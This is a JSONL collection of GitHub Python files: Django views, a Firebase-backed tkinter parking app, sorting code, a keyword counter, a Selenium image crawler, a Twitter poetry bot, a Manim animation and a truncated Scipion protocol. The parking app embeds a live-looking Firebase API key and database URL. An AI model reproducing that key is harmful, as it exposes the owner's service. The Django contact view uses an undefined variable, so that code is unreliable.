+{"seq_id":"7171196496","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 28 21:45:14 2023\n\n@author: Dell\n\"\"\"\n\n# Demo file for Spyder Tutorial\n# Hans Fangohr, University of Southampton, UK\n\ndef solution(n):\n str_n = str(n)\n part1, part2 = str_n[:len(str_n)//2], str_n[len(str_n)//2:]\n if (sum([int(i) for i in part1]) == sum([int(j) for j in part2])):\n return True\n return False\n \nnumber = 1230\nprint(solution(number))\n\nprint(number)\n","repo_name":"ruzannaghazaryan/Tutorials-Studying","sub_path":"Untitled Folder/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"10381563550","text":"from django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom .models import *\nfrom halls.models import *\nfrom django.contrib import auth ,messages\nfrom django.contrib.auth import forms\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import *\nfrom django.core.mail import send_mail, BadHeaderError\nfrom django.shortcuts import render, get_object_or_404\nfrom django.conf import settings\n\n\n\ndef index(request):\n hm_picz = home_img.objects.all()\n return render(request, 'projects/index.html')\n\n\n# Create your views here \n#login page\ndef user_login(request):\n if request.user.is_authenticated:\n return redirect('index')\n else:\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n user = auth.authenticate(username=username, password=password)\n\n if user is not None:\n auth.login(request,user)\n messages.success(request, 'Welcome to Eazyskul '+user.username)\n return redirect('index') \n else:\n messages.error(request, 'Invalid credentials')\n return redirect('login')\n else:\n return render(request, 'registration/login.html', {})\n\n\n#register function \ndef register(request):\n if request.user.is_authenticated:\n return redirect('index')\n user_form = UserRegistrationForm(request.POST)\n if request.method == 'POST':\n username = request.POST['username']\n email = request.POST['email']\n password = request.POST['password']\n password2 = request.POST['password2']\n\n if password == password2:\n if User.objects.filter(username=username).exists():\n messages.info(request, 'Username already taken')\n return redirect('signup')\n elif User.objects.filter(email=email).exists():\n messages.info(request, 'Email already taken or Invalid ')\n return redirect('signup')\n else:\n user = User.objects.create_user(username=username,email=email, password=password)\n user.save()\n messages.success(request, 'Registered successfully you can now log in')\n return redirect('login')\n else:\n messages.info(request, 'Passwords do not match') \n return redirect('signup') \n else:\n user_form = UserRegistrationForm()\n return render(request,'registration/signup.html',{'user_form': user_form})\n\n\n\n\n\n#exam page\n@login_required(login_url = 'login')\ndef exam(request):\n\n if request.method == 'POST':\n exform = examzForm(request.POST)\n if exform.is_valid():\n exform.save()\n subject = \"Eazyskul Contact request\"\n body = {\n 'name' : exform.cleaned_data['name'],\n 'email' :exform.cleaned_data['email'],\n 'reg_no' : exform.cleaned_data['reg_no'],\n 'department' : exform.cleaned_data['department'],\n 'description' : exform.cleaned_data['description'] ,\n 'school' : exform.cleaned_data['school'] ,\n }\n message = \"\\n\\n\" .join(body.values())\n\n try:\n send_mail(subject, message ,settings.EMAIL_HOST_USER, ['kingofgreatnezzz@gmail.com'])\n except BadHeaderError:\n return HttpResponse('invalid header found')\n messages.success(request,\"Request sent.You'll get a response in not less than 24 hours. Please check your mails to avoid missing communication. Thanks\")\n return render(request, \"projects/exam.html\", {'exform': exform})\n else:\n messages.error(request, 'Invalid form submission.')\n messages.error(request, exform.errors)\n else: \n exform = examzForm()\n \n return render(request,\"projects/exam.html\", {\n \"exform\": exform,\n }) \n\n#contactz_form function \n@login_required(login_url = 'login')\ndef contact(request):\n if request.method == 'POST':\n contformz = ContactzForm(request.POST)\n if contformz.is_valid():\n contformz.save()\n subject = \"Eazyskul Contact request\"\n body = {\n 'name' : exform.cleaned_data['name'],\n 'email' :exform.cleaned_data['email'],\n 'reg_no' : exform.cleaned_data['reg_no'],\n 'department' : exform.cleaned_data['department'],\n 'description' : exform.cleaned_data['description'] ,\n 'school' : exform.cleaned_data['school'] ,\n }\n message = \"\\n\\n\" .join(body.values())\n\n try:\n send_mail(subject, message ,settings.EMAIL_HOST_USER, ['kingofgreatnezzz@gmail.com'])\n except BadHeaderError:\n return HttpResponse('invalid header found')\n messages.success(request,\"Request sent.You'll get a response in not less than 24 hours. Please check your mails to avoid missing communication. Thanks\")\n return render(request, \"projects/contact.html\", {'contformz': contformz})\n else:\n messages.error(request, 'Invalid form submission.')\n messages.error(request, contformz.errors)\n else: \n contformz = ContactzForm()\n \n\n return render(request,\"projects/contact.html\", {\n \"contformz\": contformz, \n })\n\n#project page\n@login_required(login_url = 'login')\ndef project(request):\n if request.method == 'POST':\n profom = GroupFormProject(request.POST)\n if profom.is_valid():\n profom.save()\n subject = \"Eazyskul Project request\"\n body = {\n 'name' : profom.cleaned_data['name'],\n 'email' :profom.cleaned_data['email'],\n 'regno' : profom.cleaned_data['regno'],\n 'message' : profom.cleaned_data['message'],\n 'phone' : profom.cleaned_data['phone'],\n 'department' : profom.cleaned_data['department'],\n 'project_topic' : profom.cleaned_data['project_topic'] ,\n 'school' : profom.cleaned_data['school'] ,\n }\n message = \"\\n\\n\" .join(body.values())\n\n try:\n send_mail(subject, message ,settings.EMAIL_HOST_USER, ['kingofgreatnezzz@gmail.com'])\n except BadHeaderError:\n return HttpResponse('invalid header found')\n messages.success(request,\"Request sent.You'll get a response in not less than 24 hours. Please check your mails to avoid missing communication. Thanks\")\n return render(request, \"projects/project.html\", {'profom': profom})\n else:\n messages.error(request, 'Invalid form submission.')\n messages.error(request, profom.errors)\n else: \n profom = GroupFormProject()\n \n return render(request,\"projects/project.html\", {\n \"profom\": profom, \n }) \n\n#about page\ndef about(request):\n abt1 = about_picz_memebers.objects.all()\n return render(request, \"projects/about.html\", {\n \"abt1\": abt1\n })\n\n#work (EAZY SKULL) page AT \n@login_required(login_url = 'login')\ndef work(request):\n work1 = workz.objects.all()\n\n return render(request,\"projects/work.html\", {\n \"work1\" : work1\n })\n\n# pd page \n@login_required(login_url = 'login')\ndef PD(request):\n pd1= pd.objects.all()\n return render(request,\"projects/PD.html\",{\n \"pd1\" :pd1\n })\n\ndef terms_condition(request):\n return render(request, 'projects/terms_condition.html')","repo_name":"kingofgreatnezzz/eazyy","sub_path":"imt/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"17211885185","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jun 8 23:02:47 2023\r\n\r\n@author: Timotei\r\n\"\"\"\r\n\r\n# Import the required libraries\r\nimport tkinter as tk\r\nimport pyrebase\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# connecting to the Firebase databae\r\nprint('Connecting to firebase database')\r\n\r\nconfig = {\r\n 'apiKey': 'AIzaSyAbXlaAYcsovACZIAygJEo9nGEue3d4Hyw',\r\n 'authDomain': 'parking-iiotca.firebase.com',\r\n 'databaseURL': 'https://parking-iiotca-default-rtdb.firebaseio.com/',\r\n 'storageBucket': 'parking-iiotca.appspot.com'\r\n}\r\n\r\nfirebase = pyrebase.initialize_app(config)\r\n\r\n\r\n\r\n\r\n# Create an instance of tkinter frame or window\r\nwin = tk.Tk(className='Parking System')\r\n\r\n# Set the size of the tkinter window\r\nwin.geometry(\"700x350\")\r\n\r\n# Define a function update the label text\r\ndef on_click():\r\n db = firebase.database()\r\n data = db.get()\r\n print(data.val())\r\n if 'Free parking spaces' in data.val():\r\n label[\"text\"] = 'Free parking spaces: ' + str(data.val()['Free parking spaces'])\r\n else:\r\n label['text'] = 'Free parking spaces: None'\r\n \r\n# Define a function update the label text\r\ndef on_click1():\r\n db = firebase.database()\r\n data = db.get()\r\n \r\n divider = data.val()['Frames on']\r\n data = data.val()['Frames free']\r\n \r\n for name in list(data.keys()):\r\n data[name] = data[name]/divider * 100\r\n \r\n names = list(data.keys())\r\n values = list(data.values())\r\n\r\n plt.bar(range(len(data)), values, tick_label=names)\r\n plt.show()\r\n \r\n\r\n\r\n\r\n# Title\r\ntitle = tk.Label(win, text=\"Parking System\",\r\nfont=('Calibri 20 bold'))\r\ntitle.pack(pady=20)\r\n\r\n# Create a label widget\r\nlabel = tk.Label(win, text=\"Click the button bellow to see which parking slots are free\",\r\nfont=('Calibri 15'))\r\nlabel.pack(pady=20)\r\n\r\n# Create a button to update the label widget\r\nb = tk.Button(win, text=\"Get parking slots\", command=on_click)\r\nb.pack(pady=20)\r\n\r\n# Create a button to update the label widget\r\nb1 = tk.Button(win, text=\"Get parking statistics\", command=on_click1)\r\nb1.pack(pady=20)\r\n\r\n\r\nwin.mainloop()","repo_name":"Horiutu/ProiectIIOTCA","sub_path":"parking_app.py","file_name":"parking_app.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"25235383092","text":"# TO-DO: complete the helpe function below to merge 2 sorted arrays\ndef merge( arrA, arrB ):\n # prepopulating array with zeroes so it runs faster\n # elements = len( arrA ) + len( arrB )\n # merged_arr = [0] * elements\n merged_arr = []\n # TO-DO\n # while the left and right arrays still have items\n while arrA and arrB:\n left_list_item = arrA[0]\n right_list_item = arrB[0]\n\n if(left_list_item < right_list_item):\n merged_arr.append(left_list_item)\n arrA.pop(0)\n else:\n merged_arr.append(right_list_item)\n arrB.pop(0)\n\n\n\n while arrA:\n merged_arr.append(arrA[0])\n arrA.pop(0)\n\n\n while arrB:\n merged_arr.append(arrB[0])\n arrB.pop(0)\n\n return merged_arr\n\n\n# TO-DO: implement the Merge Sort function below USING RECURSION\ndef merge_sort( arr ):\n list_len = len(arr)\n # TO-DO\n if (list_len < 2):\n return arr\n\n left = arr[:list_len // 2]\n right = arr[list_len // 2:]\n\n left = merge_sort(left)\n right = merge_sort(right)\n\n return merge(left, right)\n\n\n# STRETCH: implement an in-place merge sort algorithm\ndef merge_in_place(arr, start, mid, end):\n # TO-DO\n\n return arr\n\ndef merge_sort_in_place(arr, l, r):\n # TO-DO\n\n return arr\n\n\n# STRETCH: implement the Timsort function below\n# hint: check out https://github.com/python/cpython/blob/master/Objects/listsort.txt\ndef timsort( arr ):\n\n return arr\n\narr1 = [1, 5, 8, 4, 2, 9, 6, 0, 3, 7]\n\nprint(merge_sort(arr1))","repo_name":"ElijahMcKay/Sorting","sub_path":"src/recursive_sorting/recursive_sorting.py","file_name":"recursive_sorting.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
+{"seq_id":"7811763667","text":"'''\nImproved keyword counter using AC-automata\n'''\n\nimport ahocorasick\nimport json\nfrom pathlib import Path\nimport re\n\nfiles = ['attitude.json', 'background.json', 'content.json', 'crime.json']\n\nfilepaths = [Path(__file__).parent.joinpath('data').joinpath(filename) for filename in files]\ndata = {}\nfor filepath in filepaths:\n with open(filepath, mode='r', encoding='utf-8') as jsonfile:\n data = dict(json.load(jsonfile), **data)\n\nautomaton = ahocorasick.Automaton()\nidx = 0\nempty_dict = {}\nfor key, value in data.items():\n for word in value:\n automaton.add_word(word, (idx, word, key))\n empty_dict[key] = 0\n idx += 1\n\nautomaton.make_automaton()\n\nneg = re.compile(r'(未|否|不|未能|未曾|無)$')\n\n\ndef get_keys():\n return empty_dict.keys()\n\n\ndef count_words(text: str) -> dict:\n dic = empty_dict.copy()\n for end_index, (_, original_value, keyword) in automaton.iter(text):\n start_index = end_index - len(original_value) + 1\n if not neg.match(text[max(start_index - 2, 0): start_index]):\n dic[keyword] = 1\n return dic\n\n\nif __name__ == '__main__':\n haystack = '不公然侮辱罪幹你娘勒我學他那種機掰個性,說那種機掰懶叫話幹你娘雞掰勒幹你娘勒你吃洨(閩南語,泛指精液)也沒有人要看你知道幹你娘幹你娘你連屁都不如嘛,你什麼洨'\n print(count_words(haystack))\n","repo_name":"bearrrrrrro/LawHackson","sub_path":"keyword_counter.py","file_name":"keyword_counter.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"26690837249","text":"import os\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom multiprocessing import Process, Value, Array\nfrom multiprocessing import Pool\nimport time\n\nclass RelatedImageCrawler:\n def __init__(self):\n options = Options()\n options.add_argument('--headless')\n self.driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)\n self.delay = 3 # seconds\n\n def worker(self,link):\n link.click()\n time.sleep(2)\n result_container = self.driver.find_element_by_id(\"islsp\")\n all_result_links = result_container.find_elements_by_tag_name('img')\n for l in all_result_links:\n src = l.get_attribute('src')\n if not src.startswith('data:image') and \"https://encrypted-tbn0.gstatic.com/\" not in src:\n return src\n\n def crawl(self, related_url, max = 30):\n # def worker(link):\n # link.click()\n # time.sleep(2)\n # result_container = self.driver.find_element_by_id(\"islsp\")\n # all_result_links = result_container.find_elements_by_tag_name('img')\n # for l in all_result_links:\n # src = l.get_attribute('src')\n # if not src.startswith('data:image') and \"https://encrypted-tbn0.gstatic.com/\" not in src:\n # print(src)\n # return src\n origin_urls = []\n self.driver.get(related_url)\n container_elem = self.driver.find_element_by_id(\"islrg\")\n all_links = container_elem.find_elements_by_tag_name('a')\n count = 0\n with Pool() as pool:\n for b in all_links[:]:\n href = b.get_attribute('href')\n if href is None:\n if count == max:\n return origin_urls\n count += 1\n b.click()\n time.sleep(2)\n result_container = self.driver.find_element_by_id(\"islsp\")\n all_result_links = result_container.find_elements_by_tag_name('img')\n for l in all_result_links:\n src = l.get_attribute('src')\n if not src.startswith('data:image') and \"https://encrypted-tbn0.gstatic.com/\" not in src:\n origin_urls.append(src)\n return origin_urls\n","repo_name":"vanchung1995/google_image_download","sub_path":"related_image_crawler.py","file_name":"related_image_crawler.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"30183683888","text":"import tweepy\nfrom credentials import *\nimport markovify\nimport random\nimport json\nimport re\nfrom pymorphy2 import MorphAnalyzer\nimport string\n\nmorph = MorphAnalyzer()\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth)\n\narray = []\nwith open(\"starter_data.txt\",\"r+\",encoding=\"utf-8\") as f:\n array.append(f.read())\n# ran = \"пивка! домой! думаю! размышляю! вот подумал я... что не так-то все просто. Так, да. водочки бы -- медвежий угол которая\".split(\" \")\n\n\nclass war_listener(tweepy.StreamListener):\n def make_sentence(self,arr):\n st = \" \".join(arr)\n model = markovify.Text(st, state_size=1)\n sent = \"\"\n while True:\n gn = model.make_short_sentence(60)\n if not gn:\n continue\n if len(gn) >= 25:\n exclude = \",.?!*%@:;\\\"\\'()[]+=^~`\"\n sent = ''.join(ch for ch in gn if ch not in exclude).lower()\n break\n return sent\n\n def replace_word(self, word):\n fls = [\"fet_mirror\",\"pushkin_mirror\",\"krivulin_mirror\"]\n dct = {}\n with open(random.choice(fls)+\".txt\",\"r\",encoding=\"utf-8\") as f:\n dct = json.loads(f.read())\n try:\n features = str(morph.parse(word)[0].tag).split()\n if features[0] in [\"PREP\", \"PRCL\"]:\n return word # предлоги и частицы не заменяются -- потому что pymorphy не учитывает управление предлогов и модальность, которую вн��сят частицы\n # print(features)\n if features[0] in dct:\n if len(features) == 2:\n wfin = morph.parse(random.choice(dct[features[0]]))[0].inflect({tg for tg in features[1].split(\",\")}).word\n else:\n wfin = random.choice(dct[features[0]]) # в случае, если это, например, предлог, у и него нет непостоянных признаков\n\n if word[0].isupper():\n wfin = wfin[0].upper() + wfin[1:]\n # print(wfin)\n return wfin\n else:\n return word\n except:\n print(\"no\")\n return word\n\n def generator(self, arr):\n sent = self.make_sentence(arr)\n sent3 = \"\"\n len3 = 0\n len3b = random.choice(range(1,5))\n sent2 = \" \".join([self.replace_word(w) for w in sent.split()])\n last_tweet = [(word,morph.parse(word)[0]) for word in arr[len(arr)-1].split()]\n cathegory = random.choice(['NOUN','VERB',\"ADVB\"])\n for word in last_tweet:\n if cathegory in word[1].tag:\n if len3 < len3b:\n if cathegory == \"NOUN\":\n sent3 += word[1].inflect({'nomn'}).word + \" \"\n len3 += 1\n elif cathegory == \"VERB\":\n sent3 += word[1].normalized.word + \" \"\n len3 += 1\n else:\n sent3 += word[0] + \" \"\n len3 += 1\n if len3 < len3b:\n sent3 += \"— \"*(len3b-len3)\n stroph = random.choice([1,2,3,4,0]) # какой строкой идет отзеркаленная: первой, второй или ее нет вовсе\n if stroph == 1:\n fin = sent + \"\\n\"*random.choice(range(1,3)) + sent2 + \"\\n\"*random.choice(range(2,4)) + sent3\n elif stroph == 2:\n fin = sent2 + \"\\n\"*random.choice(range(1,3)) + sent + \"\\n\"*random.choice(range(2,4)) + sent3\n elif stroph in [3,4]:\n fin = sent + \"\\n\" * random.choice(range(1, 3)) + self.make_sentence(arr) + \"\\n\" * random.choice(range(2, 4)) + sent3\n else:\n fin = sent + \"\\n\"*random.choice(range(1,3)) + sent + \"\\n\"*random.choice(range(2,4)) + sent3\n return fin\n\n def on_status(self, status):\n if status.user.screen_name != \"PoemsWar\":\n numb_tweet = 0 # отслеживает, сколько твитов добавляется в алоритм\n delay_const = 20 # каждые сколько твитов генерируется стихотворение\n txt = \"\"\n try:\n txt = status.extended_tweet['full_text']\n except:\n txt = status.text\n print('Reply to user @{}, tweet: {}'.format(status.user.screen_name, txt))\n # api.update_status(random.choice(ran))\n length = len(array)\n if not re.search(\"(RT)|(Reply)\",txt):\n array.append(txt)\n numb_tweet += 1\n print(length)\n # print(array)\n print(\"=={}==\".format(length))\n if length%delay_const == 0:\n length += 1\n print(\"\\n===============\\nBINGO!!!\\n================\")\n # print(self.generator(array))\n numb_tweet = 0\n api.update_status('{}'.format(self.generator(array)))\n # постим рандомную фразу в ответ\n def on_error(self, status_code):\n if status_code == 420:\n # если окажется, что мы посылаем слишком много запросов, то отсоединяемся\n return False\n # если какая-то другая ошибка, постараемся слушать поток дальше\n return True\n\nwar_listener = war_listener()\nmyStream = tweepy.Stream(auth = api.auth, listener=war_listener)\nmyStream.filter(track=['война','войну','войны','войне','войной'])\n\n","repo_name":"netkachevhum/homework","sub_path":"final project 2018 twitter bot/verse_bot.py","file_name":"verse_bot.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36924517318","text":"from typing import TYPE_CHECKING\n\nfrom app.bus import get_bus\nfrom app.compress import get_compressor\nfrom app.im import get_bots\nfrom app.logger import get_logger\n\nif TYPE_CHECKING:\n from logging import Logger\n from typing import TYPE_CHECKING, Dict\n\n from app._types import BotType\n from app.bus import IBus\n from app.compress import ICompressor\n from app.im import IBot\n\n\nclass IService:\n\n _bots: 'Dict[BotType, IBot]' = {}\n _logger: 'Logger' = None\n _name: str = None\n _message_bus: 'IBus' = None\n _compressor: 'ICompressor' = None\n\n def __init__(\n self,\n name: str = 'service'\n ):\n self._name = name\n self._logger = get_logger(name)\n self._bots = get_bots()\n self._compressor = get_compressor()\n self._message_bus = get_bus()\n\n self._logger.info(\n 'Init %s with Bots: %s, Compressor: %s, Message Bus: %s',\n self._name,\n list(map(lambda bot: bot.name, self._bots)),\n self._compressor.name,\n self._message_bus.name,\n )\n\n async def start(self):\n await self._message_bus.connect()\n\n async def stop(self):\n await self._message_bus.close()\n\n for bot in self._bots.values():\n await bot.destroy()\n\n self._logger.info('Service %s stopped', self._name)\n","repo_name":"ZeroTworu/bmq","sub_path":"app/domain/services/iservice.py","file_name":"iservice.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"70177287147","text":"from math import frexp\r\nfrom manim import *\r\n\r\n\r\nconfig.background_color = \"#04f404\"\r\n\r\n\r\ntextColorNormal = WHITE\r\ntextColorPositive = \"#43b929\"\r\ntextColorNegative = \"#ff2e00\"\r\nlineColor = WHITE\r\naxesColor = WHITE\r\nvertexColor = \"#e6af2e\"\r\nselectedVertexColor = \"#058ed9\"\r\n\r\n\r\nclass SimplexOnScreenDispScene(MovingCameraScene):\r\n def construct(self):\r\n\r\n self.camera.frame.save_state()\r\n self.camera.frame.scale(0.95).shift(UP*0.6, RIGHT*1.5)\r\n\r\n axes = Axes(\r\n x_length= 14,\r\n y_length= 14*9/16,\r\n x_range=[-4*16/9, 10*16/9, 1],\r\n y_range=[-4, 10, 1],\r\n axis_config={\"color\":axesColor},\r\n # tips= False\r\n )\r\n\r\n axes_labels = axes.get_axis_labels()\r\n axes_labels.set_color(WHITE)\r\n\r\n\r\n constraint1 = axes.get_graph(lambda x: x+2, color = lineColor)\r\n constraint2 = axes.get_graph(lambda x: x/3+3, color = lineColor)\r\n constraint3 = axes.get_graph(lambda x: -3*x+18, color = lineColor)\r\n constraint4 = axes.get_graph(lambda x: x-3, color = lineColor)\r\n constraints = VGroup(constraint1, constraint2, constraint3,constraint4)\r\n \r\n\r\n dot1 = Dot([-3, -1.68, 0], color = vertexColor).scale(1.2)\r\n dot2 = Dot([-3, -0.55, 0], color = vertexColor).scale(1.2)\r\n dot3 = Dot([-2.15, 0.28, 0], color = vertexColor).scale(1.2)\r\n dot4 = Dot([-0.46, 0.85, 0], color = vertexColor).scale(1.2)\r\n dot5 = Dot([-0.05, -0.42, 0], color = vertexColor).scale(1.2)\r\n dot6 = Dot([-1.31, -1.68, 0], color = vertexColor).scale(1.2)\r\n \r\n selectedDot = Dot(ORIGIN, color = selectedVertexColor).scale(1.2)\r\n selectedDot.shift(dot2.get_center())\r\n \r\n vertices = VGroup(dot1, dot2, dot3, dot4, dot5, dot6)\r\n\r\n\r\n feasibleArea = Polygon([-3, -1.68, 0], [-3, -0.55, 0], [-2.15, 0.28, 0], [-0.465, 0.85, 0], [-0.05, -0.42, 0], [-1.31, -1.68, 0])\r\n feasibleArea.set_stroke(width=3, color = WHITE)\r\n feasibleArea.set_fill(PURPLE_A, opacity = 1)\r\n\r\n self.add(axes, axes_labels, feasibleArea, constraints, vertices)\r\n self.wait(3)\r\n\r\n self.play(ApplyMethod(dot1.set_color, selectedVertexColor), run_time = 0.5)\r\n # self.wait(0.3)\r\n self.play(ApplyMethod(dot2.set_color, selectedVertexColor), run_time = 0.5)\r\n # self.wait(0.3)\r\n self.play(ApplyMethod(dot3.set_color, selectedVertexColor), run_time = 0.5)\r\n # self.wait(0.3)\r\n self.play(ApplyMethod(dot4.set_color, selectedVertexColor), run_time = 0.5)\r\n # self.wait(0.3)\r\n self.play(ApplyMethod(dot5.set_color, selectedVertexColor), run_time = 0.5)\r\n # self.wait(0.3)\r\n self.play(ApplyMethod(dot6.set_color, selectedVertexColor), run_time = 0.5)\r\n # self.wait(0.3)\r\n\r\n self.wait(3)\r\n\r\n # self.play(ApplyMethod(dot1.set_color, vertexColor), ApplyMethod(dot2.set_color, vertexColor), ApplyMethod(dot6.set_color, vertexColor))\r\n self.play(FadeOut(dot1, dot2, dot6))\r\n self.wait(2)\r\n\r\n\r\n","repo_name":"D-setia/some1","sub_path":"simplexOnScreenDisp.py","file_name":"simplexOnScreenDisp.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"1307209168","text":"# **************************************************************************\n# *\n# * Authors: J.M. De la Rosa Trevin (delarosatrevin@scilifelab.se) [1]\n# *\n# * [1] SciLifeLab, Stockholm University\n# *\n# * This program is free software; you can redistribute it and/or modify\n# * it under the terms of the GNU General Public License as published by\n# * the Free Software Foundation; either version 2 of the License, or\n# * (at your option) any later version.\n# *\n# * This program is distributed in the hope that it will be useful,\n# * but WITHOUT ANY WARRANTY; without even the implied warranty of\n# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# * GNU General Public License for more details.\n# *\n# * You should have received a copy of the GNU General Public License\n# * along with this program; if not, write to the Free Software\n# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA\n# * 02111-1307 USA\n# *\n# * All comments concerning this program package may be sent to the\n# * e-mail address 'scipion@cnb.csic.es'\n# *\n# **************************************************************************\nimport os\nfrom os.path import abspath, relpath\n\nimport numpy as np\n\nimport pyworkflow as pw\nimport pyworkflow.protocol.params as params\nfrom pyworkflow.object import String, CsvList, Set\nfrom pyworkflow.utils import removeBaseExt\nfrom pyworkflow.utils.properties import Message\nfrom pwem.emlib.image import ImageHandler\n\nfrom ..objects import TiltSeries, TiltImage, SetOfTiltSeries\nfrom .protocol_ts_base import ProtTsProcess\n\nOUTPUT_TILT_SERIES_ODD = 'TiltSeriesOdd'\nOUTPUT_TILT_SERIES_EVEN = 'TiltSeriesEven'\nEVEN = 'even'\nODD = 'odd'\nOUTPUT_TILT_SERIES_DW = 'TiltSeriesDW'\n\n\nclass ProtTsCorrectMotion(ProtTsProcess):\n \"\"\"\n Base class for movie alignment protocols such as:\n motioncorr, crosscorrelation and optical flow\n\n Alignment parameters are defined in common. For example,\n the frames range used for alignment and final sum, the binning factor\n or the cropping options (region of interest)\n \"\"\"\n _possibleOutputs = {'outputTiltSeries': SetOfTiltSeries,\n OUTPUT_TILT_SERIES_DW: SetOfTiltSeries,\n OUTPUT_TILT_SERIES_EVEN: SetOfTiltSeries,\n OUTPUT_TILT_SERIES_ODD: SetOfTiltSeries}\n\n # Even / odd functionality\n evenOddCapable = False\n TiltSeriesOdd = None\n TiltSeriesEven = None\n TiltSeriesDW = None\n # -------------------------- DEFINE param functions -----------------------\n def _defineParams(self, form, addEvenOddParam = True):\n form.addSection(label=Message.LABEL_INPUT)\n\n form.addParam('inputTiltSeriesM', params.PointerParam,\n pointerClass='SetOfTiltSeriesM',\n important=True,\n label='Input Tilt-Series (movies)',\n help='Select input tilt-series movies that you want'\n 'to correct for beam-induced motion. ')\n\n group = form.addGroup('Alignment')\n line = group.addLine('Frames to ALIGN',\n help='Frames range to ALIGN on each movie. The '\n 'first frame is 1. If you set 0 in the final '\n 'frame to align, it means that you will '\n 'align until the last frame of the movie.')\n line.addParam('alignFrame0', params.IntParam, default=1,\n label='from')\n line.addParam('alignFrameN', params.IntParam, default=0,\n label='to')\n group.addParam('useAlignToSum', params.BooleanParam, default=True,\n label='Use ALIGN frames range to SUM?',\n help=\"If *Yes*, the same frame range will be used to \"\n \"ALIGN and to SUM. If *No*, you can selected a \"\n \"different range for SUM (must be a subset).\")\n line = group.addLine('Frames to SUM', condition=\"not useAlignToSum\",\n help='Frames range to SUM on each movie. The '\n 'first frame is 1. If you set 0 in the final '\n 'frame to sum, it means that you will sum '\n 'until the last frame of the movie.')\n line.addParam('sumFrame0', params.IntParam, default=1,\n label='from')\n line.addParam('sumFrameN', params.IntParam, default=0,\n label='to')\n group.addParam('binFactor', params.FloatParam, default=1.,\n label='Binning factor',\n help='1x or 2x. Bin stack before processing.')\n\n line = group.addLine('Crop offsets (px)',\n expertLevel=params.LEVEL_ADVANCED)\n line.addParam('cropOffsetX', params.IntParam, default=0, label='X')\n line.addParam('cropOffsetY', params.IntParam, default=0, label='Y')\n\n line = group.addLine('Crop dimensions (px)',\n expertLevel=params.LEVEL_ADVANCED,\n help='How many pixels to crop from offset\\n'\n 'If equal to 0, use maximum size.')\n line.addParam('cropDimX', params.IntParam, default=0, label='X')\n line.addParam('cropDimY', params.IntParam, default=0, label='Y')\n\n if self.evenOddCapable and addEvenOddParam:\n form.addParam('splitEvenOdd', params.BooleanParam,\n default=False,\n label='Split & sum odd/even frames?',\n help='(Used for denoising data preparation). If set to Yes, 2 additional movies/tilt '\n 'series will be generated, one generated from the even frames and the other from the '\n 'odd ones using the same alignment for the whole stack of frames.')\n\n form.addParallelSection(threads=4, mpi=1)\n\n # --------------------------- STEPS functions ----------------------------\n def convertInputStep(self, inputId):\n inputTs = self.inputTiltSeriesM.get()\n ih = ImageHandler()\n\n def _convert(path, tmpFn):\n if path:\n ih.convert(path, self._getTmpPath(tmpFn))\n\n _convert(inputTs.getGain(), 'gain.mrc')\n _convert(inputTs.getDark(), 'dark.mrc')\n\n def _doSplitEvenOdd(self):\n \"\"\" Returns if even/odd stuff has to be done\"\"\"\n if not self.evenOddCapable:\n return False\n else:\n return self.splitEvenOdd.get()\n\n def processTiltImageStep(self, tsId, tiltImageId, *args):\n tiltImageM = self._tsDict.getTi(tsId, tiltImageId)\n workingFolder = self.__getTiltImageMWorkingFolder(tiltImageM)\n pw.utils.makePath(workingFolder)\n self._processTiltImageM(workingFolder, tiltImageM, *args)\n\n if self._doSplitEvenOdd():\n baseName = removeBaseExt(tiltImageM.getFileName())\n evenName = abspath(self._getExtraPath(baseName + '_avg_' + EVEN))\n oddName = abspath(self._getExtraPath(baseName + '_avg_' + ODD))\n alignedFrameStack = self._getExtraPath(baseName + '_aligned_movie.mrcs')\n # Get even/odd xmd files\n args = '--img %s ' % abspath(alignedFrameStack)\n args += '--type frames '\n args += '-o %s ' % (evenName + '.xmd')\n args += '-e %s ' % (oddName + '.xmd')\n args += '--sum_frames '\n self.runJob('xmipp_image_odd_even', args)\n\n # Update even and odd average lists\n oddfn = oddName + '_aligned.mrc'\n evenfn = evenName + '_aligned.mrc'\n\n tiltImageM.setOddEven([oddfn, evenfn])\n 